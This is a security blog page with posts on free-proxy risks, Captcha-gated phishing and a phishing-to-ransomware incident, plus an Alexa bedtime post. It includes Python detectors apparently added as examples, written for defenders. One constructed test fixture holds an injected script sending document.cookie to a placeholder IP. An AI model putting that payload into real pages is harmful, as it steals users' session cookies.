
Craig Hays


All Articles

“Alexa, Put The Kids to Bed and Make Them Sleep”

January 2, 2021 By Craig Hays

Reading Time: 3 minutes

How my Alexa voice assistant’s bedtime routine settles my kids down for an easy bedtime, every single night.

Alexa bedtime routine
Photo by Annie Spratt on Unsplash

As parents of young children, we dream of quick and pain-free bedtimes with no tantrums, tears, or bargaining. Our kids, on the other hand, often see bedtime as playtime in a different room with the lights turned down.

To combat this, my wife and I have a strict bedtime routine to ensure our little ones fall asleep happily with the least resistance possible. Our beloved Alexa is a critical member of our team. This is how it works.

Table of Contents

  • Our Amazing Alexa Kids Bedtime Routine
    • “Alexa, night night”
  • Setting Up The Perfect Kids Bedtime Alexa Routine
  • Consistency at Bedtime is Critical

Our Amazing Alexa Kids Bedtime Routine

After dinner, it’s time for a bath with some playtime followed by a wash and wind-down time. Then it’s pyjamas on, hair and teeth brushed, and into bed with a bottle of milk and a story. Once the story is done, Alexa takes over.

“Alexa, night night”

“Night night, sweetheart”, Alexa replies. The delicate sound of Baby Mine from Dumbo played soothingly on a xylophone fills the room with an audible warmth.

Within a few minutes, my little one is asleep.

Like Pavlov’s dogs, we’ve conditioned my eldest to associate going to sleep with our chosen Spotify playlist. My youngest daughter is only 7 weeks old and we’ve already started planting that same mental trigger in her head.

We could do all of this without Alexa, but having a voice assistant that kicks off the routine on a spoken command makes consistency so easy to maintain that being inconsistent would take more effort.

Setting Up The Perfect Kids Bedtime Alexa Routine

The perfect kids bedtime Alexa routine – simple yet effective
  • From the Alexa app, go to More > Routines, then create a new routine by clicking on the + icon in the top right corner.
  • Give your new routine a suitable name. I simply call mine ‘Night night’.
  • Pick your trigger phrase. Mine is: When I say “Alexa, night night”
  • Add your actions. Mine are:
    • Alexa says, “Night night, sweetheart”
    • Play my kids’ bedtime playlist on Spotify
    • From the device that I’ve spoken to.

The Spotify playlist is a custom playlist I’ve created that is simply the album “Disney Lullabies” from the artist “Rockabye Lullaby”, released in 2011. I created a playlist as, for some reason, Alexa struggles to find the album when referenced directly. Instead, the uniquely named playlist ensures that it plays the correct album every time. The last thing I want when putting my kids to sleep is unexpected death metal.

Consistency at Bedtime is Critical

Having a consistent bedtime routine is the most important element of this. The Alexa technology is a nice-to-have, hands-free, luxury that means I don’t need to get up and disturb my soon-to-be-sleeping child in order to start the music. But it isn’t Alexa that actually makes them sleep.

Doing the same thing every night establishes an automatic behavioural response from the kids which helps us to achieve what we want. Familiarity over novelty.

Recently, while my eldest was acting up at bedtime, I dropped the “Alexa, night night” bomb and as soon as the music came on she climbed straight into bed and lay down without any further encouragement. I was stunned. While I hoped it would calm her down, I didn’t think the effect would have been so instantaneous and overwhelming. I would never have thought going from tantrum to tucked up tight so quickly was possible.

Alexa routines are a great way to automate consistency in your life. Don’t get me wrong, bedtimes haven’t always been this easy, but the effort we’ve put into establishing this routine has been well worth it. Now if only Alexa could do laundry…

Why You Should Never Trust a Free Proxy Server

November 6, 2020 By Craig Hays

Reading Time: 6 minutes

Free and open proxy servers promise anonymous internet access, but at what cost?

Never trust an open proxy server
Photo by Mikael Seegen on Unsplash

In a world of ever-decreasing online privacy, it’s easy to get sucked into the ‘use an anonymous proxy to stay safe’ narrative. I’ve got nothing against using reputable proxy services or VPNs (virtual private networks), but the ‘free’ proxy services you find on the web can be anything but.

Table of Contents

  • What’s the Difference Between a Proxy and a VPN?
  • Free vs. Paid Proxies and VPNs
  • Finding ‘Free’ Open Web Proxies
  • Data Loss Through an Open Proxy
  • Data Tampering and Content Injection by the Proxy
  • Hanging Around With a Bad Crowd
  • Summary

What’s the Difference Between a Proxy and a VPN?

People use proxies and VPNs (Virtual Private Networks) to hide their real IP address and masquerade as other devices on the internet. There are many reasons to do this including bypassing content geo-restrictions, bypassing government filters (Great Firewall of China), bypassing censorship enforced by your Internet Service Provider (ISP), and hiding your real identity from others online.

Your standard internet connection gives you direct access to everything on the internet. Web pages, Skype and Zoom calls, online gaming, it all goes straight from your device to the final destination. To everyone else on the internet, you are you. Your access is limited to what your ISP and government will let you see. All of your traffic is from the country in which you reside.

A virtual private network (VPN) wraps all of your online activity in an encrypted envelope and sends it to another server, your VPN server. This server then unwraps it and sends it to where you wanted it to go. To everyone else on the internet, you are the VPN server, not the real you. Depending on the location of your VPN server, you will be able to bypass some or all of the restrictions described earlier.

A web proxy receives requests for web pages from your device and fetches those pages on your behalf. All other communication remains direct from your device to the destination servers and back. To all web servers on the internet, you are the proxy server. To everything else, you are you. This has a similar effect to a VPN but only for web browsing.

VPN vs web proxy
Standard access vs. VPN access vs. web proxy access

In summary, a VPN moves your visible internet connection from your device to a remote server. A proxy server fetches web content on your behalf but you still appear as your device to anything non-web related.

Free vs. Paid Proxies and VPNs

When you pay for a VPN or web proxy you can expect a minimum level of service in exchange for your money. That minimum level covers things like:

  • High-availability of access
  • Good transfer speeds
  • Untampered data transfers
  • No logs stored anywhere of what you do (where the provider advertises a no-logs policy)

They make money because you pay them. Therefore, they are incentivised to give a good service to keep you coming back for more.

Free VPNs and proxies, on the other hand, don’t make money directly from you. Sure, some of these services offer a ‘free tier’ where they give you a few GB of transfer for free each month. They make a profit when you upgrade to the paid version. These are freemium services with limited trials that entice you to upgrade and pay. When I talk about free proxies and VPNs I don’t mean limited-use free trials.

A ‘free’ service is one that never asks you for money, ever. When you look at these services, you must ask yourself, “why do these exist?” People generally don’t run free VPNs and open proxies for the good of humanity. When you consume these services they’re likely to be using you in some way.

As the saying goes, “if you’re not the customer, you’re the product.”

Finding ‘Free’ Open Web Proxies

A quick search on Google for ‘open web proxies’ or ‘anonymous web proxies’ returns thousands of results with links to websites listing proxy servers that anyone can use without paying a penny.

Open proxy server list from a Google search

The above is a screenshot of one of these lists. Each list contains lots of server IP addresses and ports. Anyone can configure their web browser to use any of these free, open proxies to proxy all of their web traffic to the internet. None of these servers come with any guarantees and there’s no indication of who is operating them. Many of them are in countries with very lax cybersecurity laws.

Proxy directories maintain their lists by brute-force scanning the internet for open proxies and accepting user submissions by random members of the public. There is no quality control, no peer review capability, and no oversight in any way. This means people like me can set up our own malicious ‘anonymous’ proxy servers and, within a few minutes, have strangers on the internet sending us all sorts of things.

So what can we do to the users of open proxies?

Data Loss Through an Open Proxy

If you use a proxy server for browsing the web, anything you send or receive in plain text (unencrypted HTTP) can be read by whoever runs the proxy. HTTPS traffic is different: a web proxy only tunnels it and can’t see inside, so a malicious proxy’s realistic options are to keep you on plain text in the first place or to trick you into trusting it. Forcing a ‘downgrade’ to weak, crackable cipher suites only works if your browser still accepts them, which current browsers don’t, and presenting the proxy’s own certificate for a site produces a browser warning unless you’ve been persuaded to install the proxy’s root certificate. You or your company IT team can configure your devices to refuse legacy protocols and unknown certificate authorities, but how many actually do?

Failing that, any content you download that isn’t encrypted can be altered to change all links to secure HTTPS sites to the insecure, plain-text HTTP version. Your first request to a site often starts as plain http://, so the proxy can answer it with a plain-text copy while talking to the real site over HTTPS itself, and you may not notice that your browser is no longer asking for the encrypted versions of sites as it usually would. HTTP Strict Transport Security (HSTS) exists to stop exactly this, but only for sites that send it and that your browser has already seen or has preloaded.

This probably isn’t something you need to worry about with a legitimate service, but that random, open proxy server you found on the internet?…

Data Tampering and Content Injection by the Proxy

When data is unencrypted (plain-text), malicious proxies can do more than read what you’re talking about. They can actively contribute to the conversation.

Imagine what would happen if you received a quote for a service and the proxy server you were browsing through changed the bank details of the intended recipient to their own? What if they blocked your content altogether? What if they corrupted it so that it couldn’t be trusted? All of these things are possible when you’re using an untrusted machine-in-the-middle of your comms.

Something else which is possible is ad fraud. The proxy owner swaps the advertising requests your browser makes for requests to their own ad network. The subtlety of this may vary and you may not even notice it happening. When it does, the legitimate owner of a site loses the revenue you would have generated for them. For many site owners, advertising revenue is what keeps them online.

One of the scariest things I’ve seen with open proxies is the injection of malicious JavaScript code into the existing JavaScript of every web page downloaded. Nothing else was changed, it just loaded a small piece of code into your browser every time you opened a new page. This code can access your cookies, make requests on your behalf, and even join a botnet directly from your browser.
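As an added example (not code from the original article), here is a small Python check that catches both tricks described above: the HTTPS-to-HTTP link rewriting from the data-loss section and the script injection just described. It fetches nothing itself; you give it the same page obtained directly and through the suspect proxy, and it compares links, scripts and the security headers a tampering proxy tends to strip. The two HTML documents and header sets are constructed for the example, and the hostnames and the 203.0.113.5 address are documentation placeholders, not a real proxy.

```python
"""Compare a page fetched directly with the same page fetched through an
untrusted proxy, and report link downgrades and injected scripts.

Constructed example for this article: the HTML and headers below are made up.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _LinkScriptCollector(HTMLParser):
    """Collect <a href> targets in document order and every <script>
    element, recorded as ("src", url) or ("inline", body)."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.scripts = []
        self._in_script = False
        self._inline = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.links.append(attrs["href"])
        elif tag == "script":
            if attrs.get("src"):
                self.scripts.append(("src", attrs["src"]))
            else:
                self._in_script = True
                self._inline = []

    def handle_data(self, data):
        if self._in_script:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append(("inline", "".join(self._inline).strip()))


def _collect(html_text):
    parser = _LinkScriptCollector()
    parser.feed(html_text)
    parser.close()
    return parser


def find_tampering(direct_html, proxied_html):
    """Return what the proxy changed: links that were https:// in the direct
    copy but http:// to the same host in the proxied copy (compared by
    position, assuming the proxy keeps link order), and scripts present only
    in the proxied copy."""
    direct = _collect(direct_html)
    proxied = _collect(proxied_html)

    downgraded = []
    for before, after in zip(direct.links, proxied.links):
        b, a = urlsplit(before), urlsplit(after)
        if b.scheme == "https" and a.scheme == "http" and b.netloc == a.netloc:
            downgraded.append((before, after))

    injected = [s for s in proxied.scripts if s not in direct.scripts]
    return {"downgraded_links": downgraded, "injected_scripts": injected}


def stripped_security_headers(direct_headers, proxied_headers):
    """Names of headers present directly but missing via the proxy that would
    otherwise defeat a downgrade (HSTS) or injected script (CSP)."""
    watched = ("strict-transport-security", "content-security-policy")
    direct = {k.lower() for k in direct_headers}
    proxied = {k.lower() for k in proxied_headers}
    return [h for h in watched if h in direct and h not in proxied]


# Constructed: what the origin serves when fetched directly.
DIRECT_HTML = """<html><head><script src="https://cdn.example.com/app.js"></script></head>
<body><a href="https://bank.example.com/login">Log in</a>
<a href="https://mail.example.com/">Mail</a></body></html>"""
DIRECT_HEADERS = {"Strict-Transport-Security": "max-age=31536000", "Content-Type": "text/html"}

# Constructed: the same page as returned by a tampering proxy (203.0.113.5).
PROXIED_HTML = """<html><head><script src="https://cdn.example.com/app.js"></script>
<script src="http://203.0.113.5/track.js"></script></head>
<body><a href="http://bank.example.com/login">Log in</a>
<a href="https://mail.example.com/">Mail</a>
<script>new Image().src="http://203.0.113.5/c?"+document.cookie;</script></body></html>"""
PROXIED_HEADERS = {"Content-Type": "text/html"}

if __name__ == "__main__":
    print(find_tampering(DIRECT_HTML, PROXIED_HTML))
    print(stripped_security_headers(DIRECT_HEADERS, PROXIED_HEADERS))
```

Run on the constructed pair, it reports the bank login link downgraded to http://, two scripts that the origin never sent, and a missing Strict-Transport-Security header. Comparing by position is deliberate: a proxy that reorders or removes links is itself worth flagging, which you would see as a length mismatch between the two link lists.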

Hanging Around With a Bad Crowd

Something not often discussed with open proxies is the behaviour of other users. While you might not be committing any crimes via an open proxy, that doesn’t stop others from doing it beside you. If someone commits a crime and the ‘anonymous’ proxy server is confiscated and reveals its not-so-deleted logs, your IP address and traffic history are going to be right there with the criminals’. For pretty much every scenario I can think of, I wouldn’t want my name and address linked with that activity.

Summary

Open proxies may look like a good deal, but most of the time, they’re not. If you’re not paying for them you’re most likely to be the product being sold. Stick with paid and legitimate services to stay safe. The prices are relatively low and the ‘free’ versions could cost you more in other ways.

How Phishing Websites Use Captcha to Fool Browsers and People

October 30, 2020 By Craig Hays

Reading Time: 5 minutes

Evading detection and building trust with Captcha challenges and Smishing attacks.

EE Smishing, phishing and a captcha form
The latest SMS Phishing message I’ve received from not-my-real phone company

This week I received another SMS Phishing attack which was almost identical to the Smishing attack covered previously. There were two things that struck me as particularly interesting this time:

  1. The attack used the s.id Indonesian link shortening service
  2. The attack used a Captcha page to limit access to the phishing page to real people only

Thinking about the first point, it’s clear that s.id, the “World’s shortest URL shortener”, has been chosen to minimise the size of the links in the phishing text message. I would guess that they’re also not particularly quick about removing malicious links (but I could be wrong).

The second point, the use of a Captcha form after clicking on the link in the text message, is interesting to me in three ways.

Phishing site asking you to ‘please prove that you are not a robot’

Table of Contents

  • 1. Using Captcha to Block Malware Detection
    • Automated Phishing Site Detection
  • 2. Captcha as an Accidental Credibility Indicator
  • 3. It Isn’t Even Mobile-Ready!
    • Also, Sorry DataHubClub!

1. Using Captcha to Block Malware Detection

Without a doubt, preventing the automatic detection of the phishing page on the website is the primary reason for hiding it behind a Captcha challenge.

Captcha is short for ‘Completely Automated Public Turing test to tell Computers and Humans Apart’. This is a convoluted way of saying ‘if you can read this, you’re a human and I’ll let you in.’ The premise is that automated image recognition still isn’t good enough to reliably decipher the distorted words in the image, so only people can pass the test.

What that means for automated malware scanners is that they can’t see the phishing pages that innocent people are being sent links to.

Automated Phishing Site Detection

There are a lot of people trying really hard to detect and block phishing pages in as many places as possible before they cause actual people actual harm. Tools such as Microsoft ATP and Google Safe Browsing to name just two automatically fetch and scan web pages and score them against a constantly evolving set of rules in order to determine if they’re real or fake.

When a malicious website is detected it is added to the naughty-list and any time someone tries to access that site it is either blocked or they are shown a warning message like this:

Google Chrome deceptive site ahead warning message
A suspicious website warning from the Google Chrome browser

Phishing sites usually run on commodity phishing kits – pre-packaged software bundles designed specifically for stealing and saving sensitive information without getting caught. As they’re so widely and consistently used, they’re really easy to detect. When a website has replica EE branding all over it and it isn’t the real EE domain, it’s obviously a fake site.

Fake EE phishing site hidden behind a Captcha form

By hiding the phishing kit behind a Captcha page it prevents automated scanners from analysing it. This means they can’t be automatically added to the naughty-list and users could be Captcha-ing themselves into an unsafe site without realising it.

As soon as a user sees a warning message like the ‘Deceptive Site’ one above, it’s usually game over for that particular phishing attack. Staying under the radar by evading detection means that once the user passes the Captcha challenge, there’s a high probability of the phish completing successfully.
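Added example, not part of the original post: one way a scanner can avoid being fooled by the Captcha gate is to treat the gate itself as evidence instead of a dead end. The Python below scores a fetched page on a few heuristics (a challenge shown before any real content, a brand name in the title that does not match the serving domain, arrival via a public link shortener) so that a Captcha wall on an unrelated host is queued for human or sandboxed review rather than scored as clean. The two sample pages, the cms.example.net host and the brand-to-domain table are constructed for the example; ee.co.uk is EE’s real domain, the rest is made up.

```python
"""Score a Captcha-gated page for a phishing scanner.

Constructed example for this article. Thresholds, the brand table and the
sample pages are assumptions, not data from the campaign described.
"""
import re
from html import unescape
from urllib.parse import urlsplit

# Constructed table: brand keyword -> domains that brand legitimately uses.
BRAND_DOMAINS = {
    "ee": ("ee.co.uk",),
}

# Constructed subset of public shorteners; s.id is the one from the article.
SHORTENER_HOSTS = {"s.id", "bit.ly", "tinyurl.com"}

CAPTCHA_MARKERS = re.compile(
    r"not a robot|captcha|verify (?:that )?you are human", re.I
)


def _visible_text(html_text):
    """Crude visible-text extraction: drop script/style, then all tags."""
    text = re.sub(r"<(script|style)[^>]*>.*?</\1>", " ", html_text, flags=re.S | re.I)
    text = re.sub(r"<[^>]+>", " ", text)
    return unescape(re.sub(r"\s+", " ", text)).strip()


def _host_matches(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_captcha_gate(url, html_text, referrer=None):
    """Return (score, reasons). Higher means more suspicious. A Captcha wall
    alone scores low; a wall on a host that does not belong to the brand it
    names, reached through a shortener, scores high."""
    host = (urlsplit(url).hostname or "").lower()
    text = _visible_text(html_text)
    score, reasons = 0, []

    if CAPTCHA_MARKERS.search(text) or re.search(r"<img[^>]+captcha", html_text, re.I):
        score += 2
        reasons.append("captcha challenge shown before any content")

    if len(text.split()) < 40:
        score += 1
        reasons.append("almost no visible content besides the challenge")

    title = re.search(r"<title>(.*?)</title>", html_text, re.I | re.S)
    title_text = unescape(title.group(1)).lower() if title else ""
    for brand, domains in BRAND_DOMAINS.items():
        if re.search(rf"\b{re.escape(brand)}\b", title_text) and not _host_matches(host, domains):
            score += 3
            reasons.append(f"title names '{brand}' but host {host} is not in {domains}")

    if referrer and (urlsplit(referrer).hostname or "").lower() in SHORTENER_HOSTS:
        score += 1
        reasons.append("reached via a public link shortener")

    return score, reasons


def verdict(score, threshold=4):
    """Scanner decision: 'review' keeps the URL in the pipeline for a human
    or a solver-backed sandbox instead of marking it clean."""
    return "review" if score >= threshold else "low"


# Constructed: a Captcha gate on a compromised third-party CMS, titled as EE.
PHISH_GATE_HTML = """<html><head><title>EE - Verify your account</title></head>
<body><form method="post" action="/ee/verify.php">
<p>Please prove that you are not a robot</p>
<img src="/captcha.php" alt="captcha"><input name="code"><button>Continue</button>
</form></body></html>"""

# Constructed: a genuine challenge page on the brand's own domain.
LEGIT_GATE_HTML = """<html><head><title>EE - Security check</title></head>
<body><form action="/challenge"><p>Please verify that you are human</p>
<img src="/img/captcha.png"><input name="response"></form></body></html>"""

if __name__ == "__main__":
    print(classify_captcha_gate("http://cms.example.net/ee/", PHISH_GATE_HTML, referrer="https://s.id/"))
    print(classify_captcha_gate("https://ee.co.uk/challenge", LEGIT_GATE_HTML))
```

The point of the scoring is that the Captcha is not the signal on its own; genuine sites gate things behind challenges too. The brand-versus-host mismatch and the shortener referral are what separate the two constructed pages, and a real scanner would add domain age and certificate history to the same table of reasons.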

2. Captcha as an Accidental Credibility Indicator

As a byproduct of blocking automated scanners, adding a Captcha page also gives a phishing site an unearned sense of credibility in the eyes of some users. Most of the time, when we see Captcha forms, it’s to protect something we care about from harmful robots. For example, Captcha is used to prevent bots from brute-forcing our passwords and gaining access to our online accounts.

When we see Captcha forms we have a habitual response to trust what they’re doing. It’s not particularly strong, but it’s there. For many, the context within which it appears will be enough to override any sense of ‘this is fine’. Some of the less cyber-aware people on the internet won’t see what we see. This is the target market for a phishing campaign like this.

3. It Isn’t Even Mobile-Ready!

This is the bit I find the most infuriating. The attack could have been so much better but it let itself down!

The phishing or smishing attack was delivered by text message directly to my smartphone. It’s a mobile-only attack vector and yet the Captcha part of the phishing kit isn’t even mobile ready!

While I cropped the image to make it readable in the earlier screenshot, I left the alignment and spacing as is. In fact, on my smartphone it actually looked like this:

I’ve still cropped the bottom of the image as it was ridiculously long and with a very small font…

Look how small that is!

It baffles me how attackers can be so on-the-money about one thing such as evading automatic detection and yet be clueless about how the attack is presented to the end-user. Had this been mobile-ready with a responsive layout that matched the shape and size of the screen, this entry point would have been so much more effective.

We can see that attackers and their tactics are evolving and improving over time. Next time the Captcha form might be better integrated. Next time they might even attempt to fake ‘Multi-Factor Authentication’ me since they already had my phone number to begin with. All I know is that they’re willing to experiment and get creative about future attacks in order to increase the likelihood of a payout as much as possible.

Also, Sorry DataHubClub!

(It looks like your CMS was compromised and used for this attack. I hope you get that sorted quickly. From Googling the name and domain, I suspect it’s just a dead DNS entry that’s pointing to a cloud server that someone has spun back up and taken advantage of. You’ve probably not been hacked at all… but who knows…)

Phishing Email to Company Devastating Ransomware in 5 Hours

October 25, 2020 By Craig Hays

Reading Time: 6 minutes

How hackers manually escalated from a malicious email to a devastating, company-wide ransomware takeover in under 5 hours.

It started with a phish ransomware in 5 hours
Photo by Pixabay from Pexels

(This article aims to contextualise an excellent incident report by Thedfirreport.com. I’ve used my own experience to fill in the gaps to demonstrate how these attacks affect real people in real companies.)

Table of Contents

  • The Attack Started Like Many Others
  • Malware In Disguise
  • The Malware Takes Hold
  • The Ransomware Attack Begins
  • Deploying Ryuk Ransomware and Encrypting Everything, Including The Company’s Backups
  • Lessons Learned
    • Patch Management
    • User Devices As A Way In
  • Next-Generation Intrusion Prevention

The Attack Started Like Many Others

A phishing email landed in the victim’s inbox at around 5 pm UTC and was promptly opened and read. There was nothing particularly suspicious about it. It was a well-written email with a reasonable call to action. There were no urgent demands. It wasn’t claiming to be from the company CEO. It looked identical to many of the other emails received that same day.

The company email servers scanned it and allowed it straight through to the victim’s inbox. It was sent through a legitimate and well-known email delivery service with a good reputation. There were no attachments to be scanned for malware. All it contained was a politely written request and a link to a web page.

The web page didn’t ask them to log in. It wasn’t trying to steal their password by masquerading as a trusted login page. All the victim saw was a message saying: ‘Oops! The document preview isn’t available. Click here to download’, or words to that effect. This is the sort of error message that we’ve all seen many times over the years. Most of us wouldn’t think twice about clicking that link, myself included.

Malware In Disguise

The browser downloaded a file named something like PreviewReport.DOC.exe. A warning message came up at the bottom of their browser asking if the user wanted to keep or discard the file as it could be harmful.

Regrettably, our unfortunate user downloaded all sorts of documents all day, every day, and many of them gave the exact same warning. They had learned that this warning message is just a regular part of online life: one more thing to click on in order to get work done. Out of habit, they clicked ‘keep’, then opened the file.

The executable was signed with a trusted certificate from a well-known vendor. It was malicious, and yet it was signed. The thing is, anyone can buy legitimate and trusted software signing certificates on the internet these days if you know where to look. The user’s PC had AppLocker configured to block unsigned executables but it made no difference. The trusted, signed malware executed without a problem.

Their local antivirus software had the latest virus signatures downloaded and available. As the malware was unique to this victim, the signature didn’t match anything on record. Nothing was blocked.

As far as the user was concerned, the file did nothing. Perhaps it was corrupted. Nevermind…

Sadly, it wasn’t corrupted. It sent a message out to a command and control server on the internet to say, ‘Hello, I’m here, and I’m waiting’, then opened a backdoor into the heart of the company network. It checked in using standard, encrypted HTTPS traffic, and notified the ransomware gang that it was active and waiting for instructions. From the outside, it looked exactly the same as the device’s owner viewing any other secure web page on the internet.
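Added example, not taken from the incident report: a single check-in over HTTPS is indistinguishable from browsing, but a series of them is not. The Python below reads web-proxy log lines (constructed here, not from the incident) and flags client-to-destination pairs whose connections arrive at near-constant intervals with near-constant sizes, which is what a malware beacon looks like next to real, bursty browsing. The log field layout, the 203.0.113.77 address and the thresholds are assumptions for the example.

```python
"""Flag command-and-control beaconing in proxy logs by interval regularity.

Constructed example for this article. Assumed log line layout:
    <ISO-8601 timestamp> <client IP> <method> <host:port> <bytes>
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample: 10.0.4.21 browses normally while an implant on it
# checks in with 203.0.113.77 roughly every 60 seconds with tiny payloads.
LOG_LINES = """
2020-10-20T17:06:02Z 10.0.4.21 CONNECT 203.0.113.77:443 2148
2020-10-20T17:06:05Z 10.0.4.21 CONNECT news.example.com:443 184302
2020-10-20T17:07:01Z 10.0.4.21 CONNECT 203.0.113.77:443 2150
2020-10-20T17:07:44Z 10.0.4.21 CONNECT mail.example.org:443 93311
2020-10-20T17:08:03Z 10.0.4.21 CONNECT 203.0.113.77:443 2148
2020-10-20T17:09:00Z 10.0.4.21 CONNECT 203.0.113.77:443 2151
2020-10-20T17:09:37Z 10.0.4.21 CONNECT news.example.com:443 40112
2020-10-20T17:10:02Z 10.0.4.21 CONNECT 203.0.113.77:443 2149
2020-10-20T17:11:01Z 10.0.4.21 CONNECT 203.0.113.77:443 2148
2020-10-20T17:11:59Z 10.0.4.21 CONNECT mail.example.org:443 12077
2020-10-20T17:12:03Z 10.0.4.21 CONNECT 203.0.113.77:443 2152
2020-10-20T17:13:00Z 10.0.4.21 CONNECT 203.0.113.77:443 2148
"""


def parse_lines(text):
    """Yield (timestamp, client, dest, bytes), skipping blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, client, _method, dest, size = parts
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, dest, int(size)


def find_beacons(text, min_hits=6, max_jitter=0.2, max_size_jitter=0.2):
    """Return suspected beacons: (client, dest) pairs seen at least min_hits
    times whose inter-arrival gaps and transfer sizes vary little. Jitter is
    the coefficient of variation (population stdev / mean), so 0.2 means the
    gaps stay within roughly 20% of their average."""
    series = defaultdict(list)
    for ts, client, dest, size in parse_lines(text):
        series[(client, dest)].append((ts, size))

    suspects = []
    for (client, dest), events in series.items():
        if len(events) < min_hits:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        sizes = [s for _, s in events]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue  # duplicate timestamps; not a timing pattern we can judge
        jitter = statistics.pstdev(gaps) / mean_gap
        size_jitter = statistics.pstdev(sizes) / (statistics.mean(sizes) or 1)
        if jitter <= max_jitter and size_jitter <= max_size_jitter:
            suspects.append({
                "client": client,
                "dest": dest,
                "hits": len(events),
                "mean_interval": mean_gap,
                "jitter": jitter,
                "size_jitter": size_jitter,
            })
    return suspects


if __name__ == "__main__":
    for beacon in find_beacons(LOG_LINES):
        print(beacon)
```

On the constructed lines only the 203.0.113.77 pair survives: eight connections about 60 seconds apart with a few seconds of jitter and 2148 to 2152 bytes each. The news and mail hosts have too few hits and irregular gaps. Real implants add randomised sleep to blur this, which is why the threshold is a coefficient of variation rather than an exact period; tighten it or lengthen the window depending on how noisy your proxy logs are.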

[Read more…] about Phishing Email to Company Devastating Ransomware in 5 Hours

How An Investigator Can Find Your Location From One Photograph

October 2, 2020 By Craig Hays

Reading Time: 7 minutes

Every image you post online leaks information about you. This is how anyone can find your location using Open Source Intelligence (OSINT).

How An Investigator Finds Your Location From One Photograph
Let’s find the exact location of this photograph together.

Table of Contents

  • Open Source Intelligence In Action – Geolocating a Photograph
  • The Initial Assessment and Starting OSINT Image Location
  • Digging Deeper with Google
  • What Does This Show Us?
  • What Does This Mean For Our Privacy?

Open Source Intelligence In Action – Geolocating a Photograph

Open Source Intelligence (OSINT) is the practice of using public or ‘open source’ information available on the internet to gather intelligence and gain insights on given targets. By combining data sources available online you can find answers to a variety of questions that most people wouldn’t think possible.

For example, the sunset photo above is one I took a couple of years ago while travelling for work. It’s not an instantly recognisable location. It’s probably not even that recognisable to the people who live nearby. But a motivated investigator can find the exact spot where I was standing when I captured it, using this one photograph and information freely available online.

For the rest of this walk-through, I’ll pretend that this is the first time I’ve seen this photograph. I’ll show you how I approach the challenge of finding where any camera stood on Earth when taking any photograph. While methods and results may vary, this is an example of what the OSINT process looks like for this type of scenario.

[Read more…] about How An Investigator Can Find Your Location From One Photograph
© Craig Hays, 2006–2025